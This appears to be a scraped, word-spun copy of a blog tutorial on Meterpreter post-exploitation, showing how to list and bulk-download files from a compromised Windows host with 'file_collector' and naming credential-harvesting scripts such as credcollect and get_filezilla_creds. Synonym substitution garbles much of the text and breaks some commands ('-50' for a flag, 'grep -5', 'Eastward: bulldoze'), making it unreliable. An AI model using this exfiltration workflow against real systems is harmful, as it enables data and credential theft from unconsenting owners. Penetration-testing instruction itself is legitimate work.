Msfconsole Upload and Download Files to Compormised Computer

Imagine you have compromised a target organisation equally part of a Penetration test. Additionally, every bit part of the pen-examination you need to download some files, both as proof of the compromise, and also to use the nerveless data from this organisation to help in further exploitation of other systems.

Here I discuss options for how files can be downloaded using the Metasploit Meterpreter console, and using Meterpreter scripts to speed up the procedure.

I must emphasize that these techniques should simply be used for legitimate purposes, either on a test network, or for penetration testing where you accept written permission from the data owner.

Y'all are heir to your actions, make sure that everything you practice is ethical, and use these techniques for good purposes.

We will skip the exploitation stage in these examples, to focus on the post-exploitation and data drove aspects.

Then, we accept exploited a system, and find ourselves at friendly Meterpreter panel prompt.

The Meterpreter shell has a lot of smashing features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

Downloading individual files:

From the Meterpreter console information technology is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only desire to download one file.

Meterpreter has a lot of useful inbuilt scripts to make mail exploitation tasks such equally information collection easier. To view the options, only type "run" and then space-tab-tab

to see the motorcar-completion options:

Let'southward look at "run file_collector" offset:

In the case below, I wanted to copy all the data from the Eastward: bulldoze of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target organisation, onto my attacking system ;o)

To view the "run file_collector" options, utilise "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific blueprint. First relieve files to a file, edit and
employ that same file to download the choosen files.

OPTIONS:

    -d

  Directory to start search on, search will be recursive.
-f   Search blobs separated by a |.
-h        Help carte.
-i   Input file with list of files to download, one per line.
-50   Location where to save the files.
-o   Output File to relieve the full path of files found.
-r        Search subdirectories.

meterpreter >

Every bit you can see in the clarification, this is a iii stage process. First, nosotros create a file list, and then nosotros remove any files we don't desire from the list, then nosotros execute the download process.

Creating the file listing

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking arrangement.

As Meterpreter copies files over an encrypted connection, this can make the information transfer slower, then best to strip out any unneeded files.

Editing the file list

I don't need some of the directories on the target information bulldoze, and then I use grep to remove these, and brand a new file "file.lst".

cat /root/Courses/CforLinux/file.txt | grep -5 \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst2

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not especially relevant to you, simply an instance. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)

Downloading the file list

Once we take the edited file list we tin can simply start the file download process with the following control:

run file_collector -i /root/Courses/CforLinux/file.lst -50 /root/Courses/CforLinux/

There we get, and that was a very quick way to download all the files I needed.

Other scripts for data drove

There are a whole host of data drove scripts that you can endeavor, including the post-obit:

scraper, credcollect, get_filezilla_creds, dumplinks, get_pidgin_creds, enum_chrome, enum_firefox, enum_putty, winenum

...and if yous are feeling adventurous y'all could create your own scripts. (Maybe a blog for some other time)

Mitigations

• There aren't really any mitigations for these examples. If the exploitation has got this far, information technology is basically game-over.
• Deploying a layered security program, using "Defense force in depth" can reduce the risk of the initial exploitation.

kindredharroverty.blogspot.com

Source: http://insidetrust.blogspot.com/2010/10/post-exploitation-downloading-files.html